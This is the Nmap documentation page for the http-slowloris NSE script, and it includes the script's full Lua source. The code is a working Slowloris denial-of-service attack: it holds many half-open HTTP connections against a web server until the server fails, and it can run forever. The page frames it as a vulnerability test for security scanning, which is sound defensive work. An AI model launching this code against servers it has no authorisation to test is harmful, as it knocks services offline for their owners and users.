<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-slowloris</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Aleksandar Nikolic, Ange Gutek<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-slowloris.nse">https://svn.nmap.org/nmap/scripts/http-slowloris.nse</a><br/>
<h3>Summary</h3>
<p>Tests a web server for vulnerability to the Slowloris DoS attack by launching a Slowloris attack. Slowloris was described at Defcon 17 by RSnake (see <a href="http://ha.ckers.org/slowloris/" target=_blank>http://ha.ckers.org/slowloris/</a>).</p>
<p>This script opens and maintains numerous 'half-HTTP' connections until the server runs out of resources, leading to a denial of service. When a successful DoS is detected, the script stops the attack and returns these pieces of information (which may be useful to tweak further filtering rules):</p>
<ul>
<li>Time taken until DoS</li>
<li>Number of sockets used</li>
<li>Number of queries sent</li>
</ul>
<p>By default the script runs for 30 minutes if DoS is not achieved.</p>
<p>Please note that the number of concurrent connexions must be defined with the --max-parallelism option (default is 20, suggested is 400 or more) Also, be advised that in some cases this attack can bring the web server down for good, not only while the attack is running.</p>
<p>Also, due to OS limitations, the script is unlikely to work when run from Windows.</p>
<p>See also:</p>
<ul>
<li><a href="https://nmap.org/nsedoc/scripts/http-slowloris-check.html" target=_blank>http-slowloris-check.nse</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-slowloris.runforever:</td><td>Specify that the script should continue the attack forever. Defaults to false.</td></tr>
<tr><td>http-slowloris.timelimit:</td><td>Specify maximum run time for DoS attack (30 minutes default).</td></tr>
<tr><td>http-slowloris.send_interval:</td><td>Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script http-slowloris --max-parallelism 400  &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.2.20 ((Ubuntu))
| http-slowloris:
|   Vulnerable:
|   the DoS attack took +2m22s
|   with 501 concurrent connections
|_  and 441 sent queries</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/coroutine.htm">coroutine</a></li>
<li><a href="nmap/libraries/datetime.htm">datetime</a></li>
<li><a href="nmap/libraries/math.htm">math</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/os.htm">os</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/comm.htm">comm</a></li>
</ul>
<h3>Code</h3>
<pre>local coroutine = require &quot;coroutine&quot;
local datetime = require &quot;datetime&quot;
local math = require &quot;math&quot;
local nmap = require &quot;nmap&quot;
local os = require &quot;os&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local http = require &quot;http&quot;
local comm = require &quot;comm&quot;

description = [[
Tests a web server for vulnerability to the Slowloris DoS attack by launching a Slowloris attack.

Slowloris was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/).

This script opens and maintains numerous &#39;half-HTTP&#39; connections until
the server runs out of resources, leading to a denial of service. When
a successful DoS is detected, the script stops the attack and returns
these pieces of information (which may be useful to tweak further
filtering rules):
* Time taken until DoS
* Number of sockets used
* Number of queries sent
By default the script runs for 30 minutes if DoS is not achieved.

Please note that the number of concurrent connexions must be defined
with the &lt;code&gt;--max-parallelism&lt;/code&gt; option (default is 20, suggested
is 400 or more) Also, be advised that in some cases this attack can
bring the web server down for good, not only while the attack is
running.

Also, due to OS limitations, the script is unlikely to work
when run from Windows.
]]

---
-- @usage
-- nmap --script http-slowloris --max-parallelism 400  &lt;target&gt;
--
-- @args http-slowloris.runforever Specify that the script should continue the
-- attack forever. Defaults to false.
-- @args http-slowloris.send_interval Time to wait before sending new http header datas
-- in order to maintain the connection. Defaults to 100 seconds.
-- @args http-slowloris.timelimit Specify maximum run time for DoS attack (30
-- minutes default).
--
-- @output
-- PORT     STATE SERVICE REASON  VERSION
-- 80/tcp   open  http    syn-ack Apache httpd 2.2.20 ((Ubuntu))
-- | http-slowloris:
-- |   Vulnerable:
-- |   the DoS attack took +2m22s
-- |   with 501 concurrent connections
-- |_  and 441 sent queries
--
-- @see http-slowloris-check.nse

author = {&quot;Aleksandar Nikolic&quot;, &quot;Ange Gutek&quot;}
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;dos&quot;, &quot;intrusive&quot;}


portrule = shortport.http

local SendInterval
local TimeLimit
local end_time

-- this will save the amount of still connected threads
local ThreadCount = 0
-- the maximum amount of sockets during the attack. This could be lower than the
-- requested concurrent connections because of the webserver configuration (eg
-- maxClients on Apache)
local Sockets = 1
-- this will save the amount of new lines sent to the half-http requests until
-- the target runs out of ressources
local Queries = 0

local ServerNotice
local DOSed = false
local StopAll = false
local Reason = &quot;slowloris&quot; -- DoSed due to slowloris attack or something else
local Bestopt


local function timeout_occured()
  if nmap.clock_ms() &lt; end_time or TimeLimit == nil then
    return false
  else
    StopAll = true
    return true
  end
end

-- get time (in milliseconds) when the script should finish
local function get_end_time()
  if TimeLimit == nil then
    return -1
  end
  return 1000 * TimeLimit + nmap.clock_ms()
end

-- set Time interval for threads to sleep
local function set_SendInterval()
  SendInterval = math.min(SendInterval, (end_time - nmap.clock_ms())/1000)
end

local function set_parameters()
  SendInterval = stdnse.parse_timespec(stdnse.get_script_args(&#39;http-slowloris.send_interval&#39;) or &#39;100s&#39;)
  if stdnse.get_script_args(&#39;http-slowloris.runforever&#39;) then
    TimeLimit = nil
  else
    TimeLimit = stdnse.parse_timespec(stdnse.get_script_args(&#39;http-slowloris.timelimit&#39;) or &#39;30m&#39;)
  end
end

local function do_half_http(host, port, obj)
  local condvar = nmap.condvar(obj)

  if timeout_occured() then
    condvar(&quot;signal&quot;)
    return
  end

  -- Create socket
  local slowloris = nmap.new_socket()
  slowloris:set_timeout(math.min(200 * 1000, end_time - nmap.clock_ms())) -- Set a long timeout so our socket doesn&#39;t timeout while it&#39;s waiting. At the same time left for script execution is maximum limit.

  ThreadCount = ThreadCount + 1
  local catch = function()
    -- This connection is now dead
    ThreadCount = ThreadCount - 1
    stdnse.debug1(&quot;[HALF HTTP]: lost connection&quot;)
    slowloris:close()
    slowloris = nil
    condvar(&quot;signal&quot;)
    return
  end

  local try = nmap.new_try(catch)
  try(slowloris:connect(host.ip, port, Bestopt))

  if timeout_occured() then
    ThreadCount = ThreadCount - 1
    condvar(&quot;signal&quot;)
    return
  end

  -- Build a half-http header.
  local half_http = &quot;POST /&quot; .. tostring(math.random(100000, 900000)) .. &quot; HTTP/1.1\r\n&quot; ..
    &quot;Host: &quot; .. host.ip .. &quot;\r\n&quot; ..
    &quot;User-Agent: &quot; .. http.USER_AGENT .. &quot;\r\n&quot; ..
    &quot;Content-Length: 42\r\n&quot;

  try(slowloris:send(half_http))

  if timeout_occured() then
    ThreadCount = ThreadCount - 1
    condvar(&quot;signal&quot;)
    return
  end

  ServerNotice = &quot; (attack against &quot; .. host.ip .. &quot;): HTTP stream started.&quot;
  -- During the attack some connections will die and other will respawn.
  -- Here we keep in mind the maximum concurrent connections reached.

  if Sockets &lt;= ThreadCount then Sockets = ThreadCount end

  -- Maintain a pending HTTP request by adding a new line at a regular &#39;feed&#39; interval
  while true do
    if timeout_occured() then
      break
    end
    --Setting global SendInterval before and then passing it to sleep has been
    --done so as to ensure the most updated SendInterval is assigned
    --NOTE: Effective for large number of threads
    set_SendInterval()
    stdnse.sleep(SendInterval)
    --Since sleep time could be big so check is made again for timeout
    if timeout_occured() then
      break
    end
    try(slowloris:send(&quot;X-a: b\r\n&quot;))
    Queries = Queries + 1
    ServerNotice = (&quot;(attack against %s): Feeding HTTP stream...\n(attack against %s): %d queries sent using %d connections.&quot;):format(
      host.ip, host.ip, Queries, ThreadCount)
  end
  slowloris:close()
  ThreadCount = ThreadCount - 1
  condvar(&quot;signal&quot;)
end


-- Monitor the web server
local function do_monitor(host, port)
  local general_faults = 0
  local request_faults = 0 -- keeps track of how many times we didn&#39;t get a reply from the server

  stdnse.debug1(&quot;[MONITOR]: Monitoring &quot; .. host.ip .. &quot; started&quot;)

  local request = &quot;GET / HTTP/1.1\r\n&quot; ..
    &quot;Host: &quot; .. host.ip ..
    &quot;\r\nUser-Agent: &quot; .. http.USER_AGENT .. &quot;\r\n\r\n&quot;
  local opts = {}
  local sd,_

  sd, _, Bestopt = comm.tryssl(host, port, &quot;GET / HTTP/1.0\r\n\r\n&quot;, opts) -- first determine if we need ssl
  if sd then sd:close() end

  while not StopAll do
    local monitor = nmap.new_socket()
    local status  = monitor:connect(host.ip, port, Bestopt)
    if not status then
      general_faults = general_faults + 1
      if general_faults &gt; 3 then
        Reason = &quot;not-slowloris&quot;
        DOSed = true
        break
      end
    else
      status = monitor:send(request)
      if not status then
        general_faults = general_faults + 1
        if general_faults &gt; 3 then
          Reason = &quot;not-slowloris&quot;
          DOSed = true
          break
        end
      end
      status, _ = monitor:receive_lines(1)
      if not status then
        stdnse.debug1(&quot;[MONITOR]: Didn&#39;t get a reply from &quot; .. host.ip  .. &quot;.&quot; )
        monitor:close()
        request_faults = request_faults +1
        if request_faults &gt; 3 then
          if TimeLimit then
            stdnse.debug1(&quot;[MONITOR]: server &quot; .. host.ip .. &quot; is now unavailable. The attack worked.&quot;)
            DOSed = true
          end
          monitor:close()
          break
        end
      else
        request_faults = 0
        general_faults = 0
        stdnse.debug1(&quot;[MONITOR]: &quot;.. host.ip ..&quot; still up, answer received.&quot;)
        stdnse.sleep(10)
        monitor:close()
      end
      if timeout_occured() then
        break
      end
    end
  end
end

local Mutex = nmap.mutex(&quot;http-slowloris&quot;)

local function worker_scheduler(host, port)
  local Threads = {}
  local obj = {}
  local condvar = nmap.condvar(obj)
  local i

  for i = 1, 1000 do
    -- The real amount of sockets is triggered by the
    -- &#39;--max-parallelism&#39; option. The remaining threads will replace
    -- dead sockets during the attack
    local co = stdnse.new_thread(do_half_http, host, port, obj)
    Threads[co] = true
  end

  while not DOSed and not StopAll do
    -- keep creating new threads, in case we want to run the attack indefinitely
    repeat
      if timeout_occured() then
        return
      end

      for thread in pairs(Threads) do
        if coroutine.status(thread) == &quot;dead&quot; then
          Threads[thread] = nil
        end
        if timeout_occured() then
          return
        end
      end
      stdnse.debug1(&quot;[SCHEDULER]: starting new thread&quot;)
      local co = stdnse.new_thread(do_half_http, host, port, obj)
      Threads[co] = true
      if ( next(Threads) ) then
        condvar(&quot;wait&quot;)
      end
    until next(Threads) == nil;
  end
end

action = function(host, port)

  Mutex(&quot;lock&quot;) -- we want only one slowloris instance running at a single
  -- time even if multiple hosts are specified
  -- in order to have as many sockets as we can available to
  -- this script

  set_parameters()

  local output = {}
  local start, stop, dos_time

  start = os.date(&quot;!*t&quot;)
  -- The first thread is for monitoring and is launched before the attack threads
  stdnse.new_thread(do_monitor, host, port)
  stdnse.sleep(2) -- let the monitor make the first request

  stdnse.debug1(&quot;[MAIN THREAD]: starting scheduler&quot;)
  stdnse.new_thread(worker_scheduler, host, port)
  end_time = get_end_time()
  local last_message
  if TimeLimit == nil then
    stdnse.debug1(&quot;[MAIN THREAD]: running forever!&quot;)
  end

  -- return a live notice from time to time
  while not timeout_occured() and not StopAll do
    if ServerNotice ~= last_message then
      -- don&#39;t flood the output by repeating the same info
      stdnse.debug1(&quot;[MAIN THREAD]: &quot; .. ServerNotice)
      last_message = ServerNotice
    end
    if DOSed and TimeLimit ~= nil then
      break
    end
    stdnse.sleep(10)
  end

  stop = os.date(&quot;!*t&quot;)
  dos_time = datetime.format_difftime(stop, start)
  if DOSed then
    if Reason == &quot;slowloris&quot; then
      stdnse.debug2(&quot;Slowloris Attack stopped, building output&quot;)
      output = &quot;Vulnerable:\n&quot; ..
        &quot;the DoS attack took &quot;..
        dos_time .. &quot;\n&quot; ..
        &quot;with &quot;.. Sockets .. &quot; concurrent connections\n&quot; ..
        &quot;and &quot; .. Queries ..&quot; sent queries&quot;
    else
      stdnse.debug2(&quot;Slowloris Attack stopped. Monitor couldn&#39;t communicate with the server.&quot;)
      output = &quot;Probably vulnerable:\n&quot; ..
        &quot;the DoS attack took &quot; .. dos_time .. &quot;\n&quot; ..
        &quot;with &quot; .. Sockets .. &quot; concurrent connections\n&quot; ..
        &quot;and &quot; .. Queries .. &quot; sent queries\n&quot; ..
        &quot;Monitoring thread couldn&#39;t communicate with the server. &quot; ..
        &quot;This is probably due to max clients exhaustion or something similar but not due to slowloris attack.&quot;
    end
    Mutex(&quot;done&quot;) -- release the mutex
    return stdnse.format_output(true, output)
  end
  Mutex(&quot;done&quot;) -- release the mutex
  return false
end</pre>
